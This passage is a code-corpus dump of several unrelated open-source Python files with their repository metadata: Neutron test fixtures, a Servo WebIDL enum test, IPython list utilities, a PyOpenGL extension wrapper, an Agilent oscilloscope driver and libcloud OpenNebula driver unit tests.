sort_dict_lists(self, dic): for key, value in dic.iteritems(): if isinstance(value, list): dic[key] = sorted(value) elif isinstance(value, dict): dic[key] = self.sort_dict_lists(value) return dic def assertDictSupersetOf(self, expected_subset, actual_superset): """Checks that actual dict contains the expected dict. After checking that the arguments are of the right type, this checks that each item in expected_subset is in, and matches, what is in actual_superset. Separate tests are done, so that detailed info can be reported upon failure. """ if not isinstance(expected_subset, dict): self.fail("expected_subset (%s) is not an instance of dict" % type(expected_subset)) if not isinstance(actual_superset, dict): self.fail("actual_superset (%s) is not an instance of dict" % type(actual_superset)) for k, v in expected_subset.items(): self.assertIn(k, actual_superset) self.assertEqual(v, actual_superset[k], "Key %(key)s expected: %(exp)r, actual %(act)r" % {'key': k, 'exp': v, 'act': actual_superset[k]}) class ProcessMonitorFixture(fixtures.Fixture): """Test fixture to capture and cleanup any spawn process monitor.""" def setUp(self): super(ProcessMonitorFixture, self).setUp() self.old_callable = ( external_process.ProcessMonitor._spawn_checking_thread) p = mock.patch("neutron.agent.linux.external_process.ProcessMonitor." "_spawn_checking_thread", new=lambda x: self.record_calls(x)) p.start() self.instances = [] self.addCleanup(self.stop) def stop(self): for instance in self.instances: instance.stop() def record_calls(self, instance): self.old_callable(instance) self.instances.append(instance) class BaseTestCase(DietTestCase): @staticmethod def config_parse(conf=None, args=None): """Create the default configurations.""" # neutron.conf.test includes rpc_backend which needs to be cleaned up if args is None: args = [] args += ['--config-file', etcdir('neutron.conf.test')] if conf is None: config.init(args=args) else: conf(args) def setUp(self): super(BaseTestCase, self).setUp() # suppress all but errors here capture_logs = bool_from_env('OS_LOG_CAPTURE') self.useFixture( fixtures.FakeLogger( name='neutron.api.extensions', format=LOG_FORMAT, level=std_logging.ERROR, nuke_handlers=capture_logs, )) self.useFixture(lockutils.ExternalLockFixture()) cfg.CONF.set_override('state_path', self.get_default_temp_dir().path) self.addCleanup(CONF.reset) self.useFixture(ProcessMonitorFixture()) self.useFixture(fixtures.MonkeyPatch( 'neutron.common.exceptions.NeutronException.use_fatal_exceptions', fake_use_fatal_exceptions)) self.setup_rpc_mocks() self.setup_config() policy.init() self.addCleanup(policy.reset) def get_new_temp_dir(self): """Create a new temporary directory. :returns fixtures.TempDir """ return self.useFixture(fixtures.TempDir()) def get_default_temp_dir(self): """Create a default temporary directory. Returns the same directory during the whole test case. :returns fixtures.TempDir """ if not hasattr(self, '_temp_dir'): self._temp_dir = self.get_new_temp_dir() return self._temp_dir def get_temp_file_path(self, filename, root=None): """Returns an absolute path for a temporary file. If root is None, the file is created in default temporary directory. It also creates the directory if it's not initialized yet. If root is not None, the file is created inside the directory passed as root= argument. :param filename: filename :type filename: string :param root: temporary directory to create a new file in :type root: fixtures.TempDir :returns absolute file path string """ root = root or self.get_default_temp_dir() return root.join(filename) def setup_rpc_mocks(self): # don't actually start RPC listeners when testing self.useFixture(fixtures.MonkeyPatch( 'neutron.common.rpc.Connection.consume_in_threads', fake_consume_in_threads)) self.useFixture(fixtures.MonkeyPatch( 'oslo_messaging.Notifier', fake_notifier.FakeNotifier)) self.messaging_conf = messaging_conffixture.ConfFixture(CONF) self.messaging_conf.transport_driver = 'fake' # NOTE(russellb) We want all calls to return immediately. self.messaging_conf.response_timeout = 0 self.useFixture(self.messaging_conf) self.addCleanup(n_rpc.clear_extra_exmods) n_rpc.add_extra_exmods('neutron.test') self.addCleanup(n_rpc.cleanup) n_rpc.init(CONF) def setup_config(self, args=None): """Tests that need a non-default config can override this method.""" self.config_parse(args=args) def config(self, **kw): """Override some configuration values. The keyword arguments are the names of configuration options to override and their values. If a group argument is supplied, the overrides are applied to the specified configuration option group. All overrides are automatically cleared at the end of the current test by the fixtures cleanup process. """ group = kw.pop('group', None) for k, v in kw.iteritems(): CONF.set_override(k, v, group) def setup_coreplugin(self, core_plugin=None): self.useFixture(PluginFixture(core_plugin)) def setup_notification_driver(self, notification_driver=None): self.addCleanup(fake_notifier.reset) if notification_driver is None: notification_driver = [fake_notifier.__name__] cfg.CONF.set_override("notification_driver", notification_driver) class PluginFixture(fixtures.Fixture): def __init__(self, core_plugin=None): self.core_plugin = core_plugin def setUp(self): super(PluginFixture, self).setUp() self.dhcp_periodic_p = mock.patch( 'neutron.db.agentschedulers_db.DhcpAgentSchedulerDbMixin.' 'start_periodic_dhcp_agent_status_check') self.patched_dhcp_periodic = self.dhcp_periodic_p.start() # Plugin cleanup should be triggered last so that # test-specific cleanup has a chance to release references. self.addCleanup(self.cleanup_core_plugin) if self.core_plugin is not None: cfg.CONF.set_override('core_plugin', self.core_plugin) def cleanup_core_plugin(self): """Ensure that the core plugin is deallocated.""" nm = manager.NeutronManager if not nm.has_instance(): return # TODO(marun) Fix plugins that do not properly initialize notifiers agentschedulers_db.AgentSchedulerDbMixin.agent_notifiers = {} # Perform a check for deallocation only if explicitly # configured to do so since calling gc.collect() after every # test increases test suite execution time by ~50%. check_plugin_deallocation = ( bool_from_env('OS_CHECK_PLUGIN_DEALLOCATION')) if check_plugin_deallocation: plugin = weakref.ref(nm._instance.plugin) nm.clear_instance() if check_plugin_deallocation: gc.collect() # TODO(marun) Ensure that mocks are deallocated? if plugin() and not isinstance(plugin(), mock.Base): raise AssertionError( 'The plugin for this test was not deallocated.')
apache-2.0
ryancanhelpyou/servo
components/script/dom/bindings/codegen/parser/tests/test_enum.py
134
2866
import WebIDL def WebIDLTest(parser, harness): parser.parse(""" enum TestEnum { "", "foo", "bar" }; interface TestEnumInterface { TestEnum doFoo(boolean arg); readonly attribute TestEnum foo; }; """) results = parser.finish() harness.ok(True, "TestEnumInterfaces interface parsed without error.") harness.check(len(results), 2, "Should be one production") harness.ok(isinstance(results[0], WebIDL.IDLEnum), "Should be an IDLEnum") harness.ok(isinstance(results[1], WebIDL.IDLInterface), "Should be an IDLInterface") enum = results[0] harness.check(enum.identifier.QName(), "::TestEnum", "Enum has the right QName") harness.check(enum.identifier.name, "TestEnum", "Enum has the right name") harness.check(enum.values(), ["", "foo", "bar"], "Enum has the right values") iface = results[1] harness.check(iface.identifier.QName(), "::TestEnumInterface", "Interface has the right QName") harness.check(iface.identifier.name, "TestEnumInterface", "Interface has the right name") harness.check(iface.parent, None, "Interface has no parent") members = iface.members harness.check(len(members), 2, "Should be one production") harness.ok(isinstance(members[0], WebIDL.IDLMethod), "Should be an IDLMethod") method = members[0] harness.check(method.identifier.QName(), "::TestEnumInterface::doFoo", "Method has correct QName") harness.check(method.identifier.name, "doFoo", "Method has correct name") signatures = method.signatures() harness.check(len(signatures), 1, "Expect one signature") (returnType, arguments) = signatures[0] harness.check(str(returnType), "TestEnum (Wrapper)", "Method type is the correct name") harness.check(len(arguments), 1, "Method has the right number of arguments") arg = arguments[0] harness.ok(isinstance(arg, WebIDL.IDLArgument), "Should be an IDLArgument") harness.check(str(arg.type), "Boolean", "Argument has the right type") attr = members[1] harness.check(attr.identifier.QName(), "::TestEnumInterface::foo", "Attr has correct QName") harness.check(attr.identifier.name, "foo", "Attr has correct name") harness.check(str(attr.type), "TestEnum (Wrapper)", "Attr type is the correct name") # Now reset our parser parser = parser.reset() threw = False try: parser.parse(""" enum Enum { "a", "b", "c" }; interface TestInterface { void foo(optional Enum e = "d"); }; """) results = parser.finish() except: threw = True harness.ok(threw, "Should not allow a bogus default value for an enum")
mpl-2.0
noslenfa/tdjangorest
uw/lib/python2.7/site-packages/IPython/utils/data.py
3
1165
# encoding: utf-8 """Utilities for working with data structures like lists, dicts and tuples. """ #----------------------------------------------------------------------------- # Copyright (C) 2008-2011 The IPython Development Team # # Distributed under the terms of the BSD License. The full license is in # the file COPYING, distributed as part of this software. #----------------------------------------------------------------------------- def uniq_stable(elems): """uniq_stable(elems) -> list Return from an iterable, a list of all the unique elements in the input, but maintaining the order in which they first appear. Note: All elements in the input must be hashable for this routine to work, as it internally uses a set for efficiency reasons. """ seen = set() return [x for x in elems if x not in seen and not seen.add(x)] def flatten(seq): """Flatten a list of lists (NOT recursive, only works for 2d lists).""" return [x for subseq in seq for x in subseq] def chop(seq, size): """Chop a sequence into chunks of the given size.""" return [seq[i:i+size] for i in xrange(0,len(seq),size)]
apache-2.0
D4wN/brickv
src/build_data/windows/OpenGL/GL/ATI/text_fragment_shader.py
4
3610
'''OpenGL extension ATI.text_fragment_shader This module customises the behaviour of the OpenGL.raw.GL.ATI.text_fragment_shader to provide a more Python-friendly API Overview (from the spec) The ATI_fragment_shader extension exposes a powerful fragment processing model that provides a very general means of expressing fragment color blending and dependent texture address modification. The processing is termed a fragment shader or fragment program and is specifed using a register-based model in which there are fixed numbers of instructions, texture lookups, read/write registers, and constants. ATI_fragment_shader provides a unified instruction set for operating on address or color data and eliminates the distinction between the two. That extension provides all the interfaces necessary to fully expose this programmable fragment processor in GL. ATI_text_fragment_shader is a redefinition of the ATI_fragment_shader functionality, using a slightly different interface. The intent of creating ATI_text_fragment_shader is to take a step towards treating fragment programs similar to other programmable parts of the GL rendering pipeline, specifically vertex programs. This new interface is intended to appear similar to the ARB_vertex_program API, within the limits of the feature set exposed by the original ATI_fragment_shader extension. The most significant differences between the two extensions are: (1) ATI_fragment_shader provides a procedural function call interface to specify the fragment program, whereas ATI_text_fragment_shader uses a textual string to specify the program. The fundamental syntax and constructs of the program "language" remain the same. (2) The program object managment portions of the interface, namely the routines used to create, bind, and delete program objects and set program constants are managed using the framework defined by ARB_vertex_program. (3) ATI_fragment_shader refers to the description of the programmable fragment processing as a "fragment shader". In keeping with the desire to treat all programmable parts of the pipeline consistently, ATI_text_fragment_shader refers to these as "fragment programs". The name of the extension is left as ATI_text_fragment_shader instead of ATI_text_fragment_program in order to indicate the underlying similarity between the API's of the two extensions, and to differentiate it from any other potential extensions that may be able to move even further in the direction of treating fragment programs as just another programmable area of the GL pipeline. Although ATI_fragment_shader was originally conceived as a device-independent extension that would expose the capabilities of future generations of hardware, changing trends in programmable hardware have affected the lifespan of this extension. For this reason you will now find a fixed set of features and resources exposed, and the queries to determine this set have been deprecated in ATI_fragment_shader. Further, in ATI_text_fragment_shader, most of these resource limits are fixed by the text grammar and the queries have been removed altogether. The official definition of this extension is available here: http://www.opengl.org/registry/specs/ATI/text_fragment_shader.txt ''' from OpenGL import platform, constants, constant, arrays from OpenGL import extensions, wrapper from OpenGL.GL import glget import ctypes from OpenGL.raw.GL.ATI.text_fragment_shader import * ### END AUTOGENERATED SECTION
gpl-2.0
Diti24/python-ivi
ivi/agilent/agilentDSA90804A.py
1
1686
""" Python Interchangeable Virtual Instrument Library Copyright (c) 2012-2016 Alex Forencich Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from .agilent90000 import * class agilentDSA90804A(agilent90000): "Agilent Infiniium DSA90804A IVI oscilloscope driver" def __init__(self, *args, **kwargs): self.__dict__.setdefault('_instrument_id', 'DSO90804A') super(agilentDSA90804A, self).__init__(*args, **kwargs) self._analog_channel_count = 4 self._digital_channel_count = 0 self._channel_count = self._analog_channel_count + self._digital_channel_count self._bandwidth = 8e9 self._init_channels()
mit
mtekel/libcloud
libcloud/test/compute/test_opennebula.py
46
46927
# Copyright 2002-2009, Distributed Systems Architecture Group, Universidad # Complutense de Madrid (dsa-research.org) # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ OpenNebula.org test suite. """ __docformat__ = 'epytext' import unittest import sys from libcloud.utils.py3 import httplib from libcloud.compute.base import Node, NodeImage, NodeSize, NodeState from libcloud.compute.drivers.opennebula import OpenNebulaNodeDriver from libcloud.compute.drivers.opennebula import OpenNebulaNetwork from libcloud.compute.drivers.opennebula import OpenNebulaResponse from libcloud.compute.drivers.opennebula import OpenNebulaNodeSize from libcloud.compute.drivers.opennebula import ACTION from libcloud.test.file_fixtures import ComputeFileFixtures from libcloud.common.types import InvalidCredsError from libcloud.test import MockResponse, MockHttp from libcloud.test.compute import TestCaseMixin from libcloud.test.secrets import OPENNEBULA_PARAMS class OpenNebulaCaseMixin(TestCaseMixin): def test_reboot_node_response(self): pass class OpenNebula_ResponseTests(unittest.TestCase): XML = """<?xml version="1.0" encoding="UTF-8"?><root/>""" def test_unauthorized_response(self): http_response = MockResponse(httplib.UNAUTHORIZED, OpenNebula_ResponseTests.XML, headers={'content-type': 'application/xml'}) try: OpenNebulaResponse(http_response, None).parse_body() except InvalidCredsError: exceptionType = sys.exc_info()[0] self.assertEqual(exceptionType, type(InvalidCredsError())) class OpenNebula_1_4_Tests(unittest.TestCase, OpenNebulaCaseMixin): """ OpenNebula.org test suite for OpenNebula v1.4. """ def setUp(self): """ Setup test environment. """ OpenNebulaNodeDriver.connectionCls.conn_classes = ( OpenNebula_1_4_MockHttp, OpenNebula_1_4_MockHttp) self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('1.4',)) def test_create_node(self): """ Test create_node functionality. """ image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver) size = NodeSize(id=1, name='small', ram=None, disk=None, bandwidth=None, price=None, driver=self.driver) networks = list() networks.append(OpenNebulaNetwork(id=5, name='Network 5', address='192.168.0.0', size=256, driver=self.driver)) networks.append(OpenNebulaNetwork(id=15, name='Network 15', address='192.168.1.0', size=256, driver=self.driver)) node = self.driver.create_node(name='Compute 5', image=image, size=size, networks=networks) self.assertEqual(node.id, '5') self.assertEqual(node.name, 'Compute 5') self.assertEqual(node.state, OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE']) self.assertEqual(node.public_ips[0].name, None) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].address, '192.168.0.1') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[1].name, None) self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].address, '192.168.1.1') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.private_ips, []) self.assertEqual(node.image.id, '5') self.assertEqual(node.image.extra['dev'], 'sda1') def test_destroy_node(self): """ Test destroy_node functionality. """ node = Node(5, None, None, None, None, self.driver) ret = self.driver.destroy_node(node) self.assertTrue(ret) def test_list_nodes(self): """ Test list_nodes functionality. """ nodes = self.driver.list_nodes() self.assertEqual(len(nodes), 3) node = nodes[0] self.assertEqual(node.id, '5') self.assertEqual(node.name, 'Compute 5') self.assertEqual(node.state, OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE']) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, None) self.assertEqual(node.public_ips[0].address, '192.168.0.1') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, None) self.assertEqual(node.public_ips[1].address, '192.168.1.1') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.private_ips, []) self.assertEqual(node.image.id, '5') self.assertEqual(node.image.extra['dev'], 'sda1') node = nodes[1] self.assertEqual(node.id, '15') self.assertEqual(node.name, 'Compute 15') self.assertEqual(node.state, OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE']) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, None) self.assertEqual(node.public_ips[0].address, '192.168.0.2') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, None) self.assertEqual(node.public_ips[1].address, '192.168.1.2') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.private_ips, []) self.assertEqual(node.image.id, '15') self.assertEqual(node.image.extra['dev'], 'sda1') node = nodes[2] self.assertEqual(node.id, '25') self.assertEqual(node.name, 'Compute 25') self.assertEqual(node.state, NodeState.UNKNOWN) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, None) self.assertEqual(node.public_ips[0].address, '192.168.0.3') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, None) self.assertEqual(node.public_ips[1].address, '192.168.1.3') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.private_ips, []) self.assertEqual(node.image, None) def test_list_images(self): """ Test list_images functionality. """ images = self.driver.list_images() self.assertEqual(len(images), 2) image = images[0] self.assertEqual(image.id, '5') self.assertEqual(image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(image.extra['size'], '2048') self.assertEqual(image.extra['url'], 'file:///images/ubuntu/jaunty.img') image = images[1] self.assertEqual(image.id, '15') self.assertEqual(image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(image.extra['size'], '2048') self.assertEqual(image.extra['url'], 'file:///images/ubuntu/jaunty.img') def test_list_sizes(self): """ Test list_sizes functionality. """ sizes = self.driver.list_sizes() self.assertEqual(len(sizes), 3) size = sizes[0] self.assertEqual(size.id, '1') self.assertEqual(size.name, 'small') self.assertEqual(size.ram, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[1] self.assertEqual(size.id, '2') self.assertEqual(size.name, 'medium') self.assertEqual(size.ram, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[2] self.assertEqual(size.id, '3') self.assertEqual(size.name, 'large') self.assertEqual(size.ram, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) def test_list_locations(self): """ Test list_locations functionality. """ locations = self.driver.list_locations() self.assertEqual(len(locations), 1) location = locations[0] self.assertEqual(location.id, '0') self.assertEqual(location.name, '') self.assertEqual(location.country, '') def test_ex_list_networks(self): """ Test ex_list_networks functionality. """ networks = self.driver.ex_list_networks() self.assertEqual(len(networks), 2) network = networks[0] self.assertEqual(network.id, '5') self.assertEqual(network.name, 'Network 5') self.assertEqual(network.address, '192.168.0.0') self.assertEqual(network.size, '256') network = networks[1] self.assertEqual(network.id, '15') self.assertEqual(network.name, 'Network 15') self.assertEqual(network.address, '192.168.1.0') self.assertEqual(network.size, '256') def test_ex_node_action(self): """ Test ex_node_action functionality. """ node = Node(5, None, None, None, None, self.driver) ret = self.driver.ex_node_action(node, ACTION.STOP) self.assertTrue(ret) class OpenNebula_2_0_Tests(unittest.TestCase, OpenNebulaCaseMixin): """ OpenNebula.org test suite for OpenNebula v2.0 through v2.2. """ def setUp(self): """ Setup test environment. """ OpenNebulaNodeDriver.connectionCls.conn_classes = ( OpenNebula_2_0_MockHttp, OpenNebula_2_0_MockHttp) self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('2.0',)) def test_create_node(self): """ Test create_node functionality. """ image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver) size = OpenNebulaNodeSize(id=1, name='small', ram=1024, cpu=1, disk=None, bandwidth=None, price=None, driver=self.driver) networks = list() networks.append(OpenNebulaNetwork(id=5, name='Network 5', address='192.168.0.0', size=256, driver=self.driver)) networks.append(OpenNebulaNetwork(id=15, name='Network 15', address='192.168.1.0', size=256, driver=self.driver)) context = {'hostname': 'compute-5'} node = self.driver.create_node(name='Compute 5', image=image, size=size, networks=networks, context=context) self.assertEqual(node.id, '5') self.assertEqual(node.name, 'Compute 5') self.assertEqual(node.state, OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE']) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, 'Network 5') self.assertEqual(node.public_ips[0].address, '192.168.0.1') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:01') self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, 'Network 15') self.assertEqual(node.public_ips[1].address, '192.168.1.1') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:01') self.assertEqual(node.private_ips, []) self.assertTrue(len([s for s in self.driver.list_sizes() if s.id == node.size.id]) == 1) self.assertEqual(node.image.id, '5') self.assertEqual(node.image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(node.image.extra['type'], 'DISK') self.assertEqual(node.image.extra['target'], 'hda') context = node.extra['context'] self.assertEqual(context['hostname'], 'compute-5') def test_destroy_node(self): """ Test destroy_node functionality. """ node = Node(5, None, None, None, None, self.driver) ret = self.driver.destroy_node(node) self.assertTrue(ret) def test_list_nodes(self): """ Test list_nodes functionality. """ nodes = self.driver.list_nodes() self.assertEqual(len(nodes), 3) node = nodes[0] self.assertEqual(node.id, '5') self.assertEqual(node.name, 'Compute 5') self.assertEqual(node.state, OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE']) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, 'Network 5') self.assertEqual(node.public_ips[0].address, '192.168.0.1') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:01') self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, 'Network 15') self.assertEqual(node.public_ips[1].address, '192.168.1.1') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:01') self.assertEqual(node.private_ips, []) self.assertTrue(len([size for size in self.driver.list_sizes() if size.id == node.size.id]) == 1) self.assertEqual(node.size.id, '1') self.assertEqual(node.size.name, 'small') self.assertEqual(node.size.ram, 1024) self.assertTrue(node.size.cpu is None or isinstance(node.size.cpu, int)) self.assertTrue(node.size.vcpu is None or isinstance(node.size.vcpu, int)) self.assertEqual(node.size.cpu, 1) self.assertEqual(node.size.vcpu, None) self.assertEqual(node.size.disk, None) self.assertEqual(node.size.bandwidth, None) self.assertEqual(node.size.price, None) self.assertTrue(len([image for image in self.driver.list_images() if image.id == node.image.id]) == 1) self.assertEqual(node.image.id, '5') self.assertEqual(node.image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(node.image.extra['type'], 'DISK') self.assertEqual(node.image.extra['target'], 'hda') context = node.extra['context'] self.assertEqual(context['hostname'], 'compute-5') node = nodes[1] self.assertEqual(node.id, '15') self.assertEqual(node.name, 'Compute 15') self.assertEqual(node.state, OpenNebulaNodeDriver.NODE_STATE_MAP['ACTIVE']) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, 'Network 5') self.assertEqual(node.public_ips[0].address, '192.168.0.2') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:02') self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, 'Network 15') self.assertEqual(node.public_ips[1].address, '192.168.1.2') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:02') self.assertEqual(node.private_ips, []) self.assertTrue(len([size for size in self.driver.list_sizes() if size.id == node.size.id]) == 1) self.assertEqual(node.size.id, '1') self.assertEqual(node.size.name, 'small') self.assertEqual(node.size.ram, 1024) self.assertTrue(node.size.cpu is None or isinstance(node.size.cpu, int)) self.assertTrue(node.size.vcpu is None or isinstance(node.size.vcpu, int)) self.assertEqual(node.size.cpu, 1) self.assertEqual(node.size.vcpu, None) self.assertEqual(node.size.disk, None) self.assertEqual(node.size.bandwidth, None) self.assertEqual(node.size.price, None) self.assertTrue(len([image for image in self.driver.list_images() if image.id == node.image.id]) == 1) self.assertEqual(node.image.id, '15') self.assertEqual(node.image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(node.image.extra['type'], 'DISK') self.assertEqual(node.image.extra['target'], 'hda') context = node.extra['context'] self.assertEqual(context['hostname'], 'compute-15') node = nodes[2] self.assertEqual(node.id, '25') self.assertEqual(node.name, 'Compute 25') self.assertEqual(node.state, NodeState.UNKNOWN) self.assertEqual(node.public_ips[0].id, '5') self.assertEqual(node.public_ips[0].name, 'Network 5') self.assertEqual(node.public_ips[0].address, '192.168.0.3') self.assertEqual(node.public_ips[0].size, 1) self.assertEqual(node.public_ips[0].extra['mac'], '02:00:c0:a8:00:03') self.assertEqual(node.public_ips[1].id, '15') self.assertEqual(node.public_ips[1].name, 'Network 15') self.assertEqual(node.public_ips[1].address, '192.168.1.3') self.assertEqual(node.public_ips[1].size, 1) self.assertEqual(node.public_ips[1].extra['mac'], '02:00:c0:a8:01:03') self.assertEqual(node.private_ips, []) self.assertEqual(node.size, None) self.assertEqual(node.image, None) context = node.extra['context'] self.assertEqual(context, {}) def test_list_images(self): """ Test list_images functionality. """ images = self.driver.list_images() self.assertEqual(len(images), 2) image = images[0] self.assertEqual(image.id, '5') self.assertEqual(image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(image.extra['description'], 'Ubuntu 9.04 LAMP Description') self.assertEqual(image.extra['type'], 'OS') self.assertEqual(image.extra['size'], '2048') image = images[1] self.assertEqual(image.id, '15') self.assertEqual(image.name, 'Ubuntu 9.04 LAMP') self.assertEqual(image.extra['description'], 'Ubuntu 9.04 LAMP Description') self.assertEqual(image.extra['type'], 'OS') self.assertEqual(image.extra['size'], '2048') def test_list_sizes(self): """ Test list_sizes functionality. """ sizes = self.driver.list_sizes() self.assertEqual(len(sizes), 4) size = sizes[0] self.assertEqual(size.id, '1') self.assertEqual(size.name, 'small') self.assertEqual(size.ram, 1024) self.assertTrue(size.cpu is None or isinstance(size.cpu, int)) self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int)) self.assertEqual(size.cpu, 1) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[1] self.assertEqual(size.id, '2') self.assertEqual(size.name, 'medium') self.assertEqual(size.ram, 4096) self.assertTrue(size.cpu is None or isinstance(size.cpu, int)) self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int)) self.assertEqual(size.cpu, 4) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[2] self.assertEqual(size.id, '3') self.assertEqual(size.name, 'large') self.assertEqual(size.ram, 8192) self.assertTrue(size.cpu is None or isinstance(size.cpu, int)) self.assertTrue(size.vcpu is None or isinstance(size.vcpu, int)) self.assertEqual(size.cpu, 8) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) size = sizes[3] self.assertEqual(size.id, '4') self.assertEqual(size.name, 'custom') self.assertEqual(size.ram, 0) self.assertEqual(size.cpu, 0) self.assertEqual(size.vcpu, None) self.assertEqual(size.disk, None) self.assertEqual(size.bandwidth, None) self.assertEqual(size.price, None) def test_list_locations(self): """ Test list_locations functionality. """ locations = self.driver.list_locations() self.assertEqual(len(locations), 1) location = locations[0] self.assertEqual(location.id, '0') self.assertEqual(location.name, '') self.assertEqual(location.country, '') def test_ex_list_networks(self): """ Test ex_list_networks functionality. """ networks = self.driver.ex_list_networks() self.assertEqual(len(networks), 2) network = networks[0] self.assertEqual(network.id, '5') self.assertEqual(network.name, 'Network 5') self.assertEqual(network.address, '192.168.0.0') self.assertEqual(network.size, '256') network = networks[1] self.assertEqual(network.id, '15') self.assertEqual(network.name, 'Network 15') self.assertEqual(network.address, '192.168.1.0') self.assertEqual(network.size, '256') class OpenNebula_3_0_Tests(unittest.TestCase, OpenNebulaCaseMixin): """ OpenNebula.org test suite for OpenNebula v3.0. """ def setUp(self): """ Setup test environment. """ OpenNebulaNodeDriver.connectionCls.conn_classes = ( OpenNebula_3_0_MockHttp, OpenNebula_3_0_MockHttp) self.driver = OpenNebulaNodeDriver(*OPENNEBULA_PARAMS + ('3.0',)) def test_ex_list_networks(self): """ Test ex_list_networks functionality. """ networks = self.driver.ex_list_networks() self.assertEqual(len(networks), 2) network = networks[0] self.assertEqual(network.id, '5') self.assertEqual(network.name, 'Network 5') self.assertEqual(network.address, '192.168.0.0') self.assertEqual(network.size, '256') self.assertEqual(network.extra['public'], 'YES') network = networks[1] self.assertEqual(network.id, '15') self.assertEqual(network.name, 'Network 15') self.assertEqual(network.address, '192.168.1.0') self.assertEqual(network.size, '256') self.assertEqual(network.extra['public'], 'NO') def test_ex_node_set_save_name(self): """ Test ex_node_action functionality. """ image = NodeImage(id=5, name='Ubuntu 9.04 LAMP', driver=self.driver) node = Node(5, None, None, None, None, self.driver, image=image) ret = self.driver.ex_node_set_save_name(node, 'test') self.assertTrue(ret) class OpenNebula_3_2_Tests(unittest.TestCase, OpenNebulaCaseMixin): """ OpenNebula.org test suite for OpenNebula v3.2. """ def setUp(self): """ 